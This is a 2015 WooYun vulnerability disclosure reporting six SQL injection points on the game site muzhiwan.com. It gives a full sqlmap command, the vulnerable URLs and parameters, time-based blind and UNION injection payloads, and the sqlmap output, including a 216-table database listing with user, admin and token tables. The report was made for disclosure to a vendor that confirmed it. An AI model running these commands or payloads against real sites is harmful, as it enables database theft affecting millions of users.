当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124079

漏洞标题:拇指玩SQL注入6枚(涉及至少800W+用户数据含账号密码)

相关厂商:muzhiwan.com

漏洞作者: 凌零1

提交时间:2015-07-02 17:56

修复时间:2015-08-16 18:06

公开时间:2015-08-16 18:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-02: 厂商已经确认,细节仅向厂商公开
2015-07-12: 细节向核心白帽子及相关领域专家公开
2015-07-22: 细节向普通白帽子公开
2015-08-01: 细节向实习白帽子公开
2015-08-16: 细节向公众公开

简要描述:

泄露管理员账号密码,及大量用户信息

详细说明:

python sqlmap.py -u "http://www.muzhiwan.com/index.php?action=article&opt=comment_list" --data "aid=&num=1" -p "aid" --level 3 --dbs
1.www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1 aid处
2.www.muzhiwan.com/index.php?.exe&action=common&opt=speeddownpc&vid= vid处
3.www.muzhiwan.com/index.php?
action=common&opt=otherdown&url=aHR0cDovL3Bhbi5iYWlkdS5jb20vcy8x
Z2RLcnBFYg==&vid=&wpclick=2 vid处
4.www.muzhiwan.com/index.php?action=common&opt=speeddown&vid= vid处
5.www.muzhiwan.com/index.php?action=game&opt=getAjaxComment post:num=1&vid= vid处
6,http://gsv.muzhiwan.com/index.php?action=detail&opt=getAjaxComment post:num=1&sid= sid处

漏洞证明:

拿第一条试试吧!www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: aid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: aid=(SELECT (CASE WHEN (7953=7953) THEN SLEEP(5) ELSE 7953*(SELECT
7953 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&num=1
    Type: UNION query
    Title: Generic UNION query (random number) - 5 columns
    Payload: aid=-7257 UNION ALL SELECT CONCAT(0x71786b7671,0x61414a4b725468786e
6f,0x717a626271),1271,1271,1271,1271-- &num=1
---
[11:25:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0.12
[11:25:31] [INFO] fetching current database
current database:    'mzw'
[11:25:31] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\
output\www.muzhiwan.com'
[*] shutting down at 11:25:31
C:\Users\wjl\Desktop\sqlmapproject-sqlmap-e8f87bf>python sqlmap.py -u "http://ww
w.muzhiwan.com/index.php?action=article&opt=comment_list " --data "aid=&num=1" -
p "aid" --level 3 --current-db


RH$10D~5A`9VR@~3}E6YD3N.png


Database: mzw
[216 tables]
+--------------------------------+
| group                          |
| mzw_users-1                    |
| auth                           |
| auth_group                     |
| auth_group_relation            |
| auth_usergroup                 |
| group_apply                    |
| group_glance                   |
| group_identity                 |
| group_interior                 |
| group_member                   |
| group_member_log               |
| group_recommend                |
| group_report                   |
| group_score                    |
| group_score_list               |
| group_topic                    |
| group_topic_content            |
| group_topic_love               |
| lanxun_url                     |
| market_model_info              |
| models                         |
| mzw_ad                         |
| mzw_ad_p                       |
| mzw_admin                      |
| mzw_admin_editlog              |
| mzw_admin_gameeditlog          |
| mzw_admin_group                |
| mzw_bbs_topic                  |
| mzw_blacklist                  |
| mzw_c_ad                       |
| mzw_c_admin                    |
| mzw_c_channel                  |
| mzw_c_game                     |
| mzw_c_game_detail              |
| mzw_c_game_down                |
| mzw_c_game_snapshot            |
| mzw_c_hotsearch                |
| mzw_c_uc_mapping               |
| mzw_censorword                 |
| mzw_content_from               |
| mzw_cp_bill                    |
| mzw_cp_contact                 |
| mzw_cp_fee_ratio               |
| mzw_cp_game                    |
| mzw_cp_game_1                  |
| mzw_cp_game_append             |
| mzw_cp_game_gift               |
| mzw_cp_game_gift_code          |
| mzw_cp_game_sdk                |
| mzw_cp_game_v                  |
| mzw_cp_game_v_article          |
| mzw_cp_game_v_img              |
| mzw_cp_game_v_motion           |
| mzw_cp_member                  |
| mzw_cp_msg                     |
| mzw_cp_notice                  |
| mzw_cp_order                   |
| mzw_cp_pay                     |
| mzw_cp_sdk                     |
| mzw_cp_testfee                 |
| mzw_cp_testin                  |
| mzw_cp_user                    |
| mzw_cp_users_resetpwd          |
| mzw_crack_wishing              |
| mzw_crontab_game               |
| mzw_dabaoprogress              |
| mzw_datacopypath               |
| mzw_day_gamecount              |
| mzw_exam_score                 |
| mzw_exam_title                 |
| mzw_favorite                   |
| mzw_feedback                   |
| mzw_feedback_app               |
| mzw_feeds                      |
| mzw_fetch_html                 |
| mzw_friend_links               |
| mzw_game                       |
| mzw_game_album                 |
| mzw_game_album_comment         |
| mzw_game_album_comment_reply   |
| mzw_game_album_contents        |
| mzw_game_article               |
| mzw_game_article_auth          |
| mzw_game_article_comment       |
| mzw_game_article_comment_reply |
| mzw_game_article_detail        |
| mzw_game_article_detail_copy   |
| mzw_game_article_type          |
| mzw_game_article_vote          |
| mzw_game_black                 |
| mzw_game_device_package        |
| mzw_game_extend                |
| mzw_game_firm                  |
| mzw_game_firm_comment          |
| mzw_game_firm_comment_reply    |
| mzw_game_google                |
| mzw_game_img_webp              |
| mzw_game_net_forum             |
| mzw_game_net_gift              |
| mzw_game_net_giftbind          |
| mzw_game_net_server            |
| mzw_game_open                  |
| mzw_game_search_tags           |
| mzw_game_search_tags_bind      |
| mzw_game_tags                  |
| mzw_game_tags_bind             |
| mzw_game_tags_type             |
| mzw_game_tmp                   |
| mzw_game_type                  |
| mzw_game_unzip                 |
| mzw_game_unzip_diff            |
| mzw_game_unzip_sub             |
| mzw_game_v                     |
| mzw_game_v_comment             |
| mzw_game_v_comment_reply       |
| mzw_game_v_cp                  |
| mzw_game_v_detail              |
| mzw_game_v_diff                |
| mzw_game_v_downlist            |
| mzw_game_v_downlist_back       |
| mzw_game_v_downlist_copy       |
| mzw_game_v_downtop             |
| mzw_game_v_icon_temp           |
| mzw_game_v_img                 |
| mzw_game_v_img_copy            |
| mzw_game_v_img_temp            |
| mzw_game_v_video               |
| mzw_game_vblacklist            |
| mzw_game_vote                  |
| mzw_gift_bbs                   |
| mzw_gift_weixin                |
| mzw_gift_weixin_copy           |
| mzw_gift_weixin_copy1          |
| mzw_google_apps                |
| mzw_handle_brand               |
| mzw_handle_model               |
| mzw_hotword_tab                |
| mzw_log_ad_click_201302        |
| mzw_log_downloadgame_0         |
| mzw_log_goodarticle_0          |
| mzw_log_goodgame_0             |
| mzw_log_goodsavegame_2013      |
| mzw_log_login_201301           |
| mzw_log_sf_download_0          |
| mzw_mobile_brand               |
| mzw_mobile_cpubrand            |
| mzw_mobile_cpubrand_adp        |
| mzw_mobile_cpumodel            |
| mzw_mobile_forum               |
| mzw_mobile_manual_pwd          |
| mzw_mobile_model               |
| mzw_mobile_modelcode           |
| mzw_mobile_modelcode_rel       |
| mzw_mobile_verify_message      |
| mzw_models                     |
| mzw_our_company                |
| mzw_our_postinfo               |
| mzw_pay                        |
| mzw_pc_feedback                |
| mzw_phone_msg_log              |
| mzw_project                    |
| mzw_project_picture            |
| mzw_question                   |
| mzw_question_answer            |
| mzw_report_tab                 |
| mzw_save_game                  |
| mzw_save_game_blacklist        |
| mzw_save_game_category         |
| mzw_save_game_comment          |
| mzw_save_game_comment_reply    |
| mzw_save_game_for              |
| mzw_save_game_for_comment      |
| mzw_save_game_img              |
| mzw_save_game_send             |
| mzw_save_gamenotexistgame      |
| mzw_sdk_oauth2_authcodes       |
| mzw_sdk_oauth2_clients         |
| mzw_sdk_oauth2_tokens          |
| mzw_sdk_pay_notifyrecord       |
| mzw_sdk_pay_orders             |
| mzw_sdk_pay_orders_info        |
| mzw_sdk_pay_yeepaytoken        |
| mzw_sdk_phone_msg_log          |
| mzw_short_url                  |
| mzw_short_url_key              |
| mzw_snoopy_game                |
| mzw_snoopy_gift                |
| mzw_u_test                     |
| mzw_update                     |
| mzw_user_game                  |
| mzw_user_gamev                 |
| mzw_user_gamevcomment          |
| mzw_user_gamevcomment_reply    |
| mzw_user_gamevdetail           |
| mzw_user_gamevdownlist         |
| mzw_user_gamevimg              |
| mzw_user_reg                   |
| mzw_userbehavior               |
| mzw_userdevice                 |
| mzw_userdevice_bind            |
| mzw_users                      |
| mzw_users_1                    |
| mzw_users_6                    |
| mzw_users_accesstoken          |
| mzw_users_origin               |
| mzw_users_phone                |
| mzw_users_photo_create         |
| mzw_users_profile              |
| mzw_users_resetpwd             |
| mzw_users_sign                 |
| mzw_weibo_score                |
| mzw_zhuanti_comment            |
| pre_ucenter_members_cpfrom502  |
| static_sdk_compatibility       |
| tmp_02                         |
+--------------------------------+


看下其中一个表

YSZYQ`933CXCIS5V549GK%O.png


7W{{}68V(@W8FF@%4))844H.jpg


修复方案:

不忽略就ok,高rank- -!!

版权声明:转载请注明来源 凌零1@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-02 18:04

厂商回复:

谢谢,我们会抓紧时间修复

最新状态:

暂无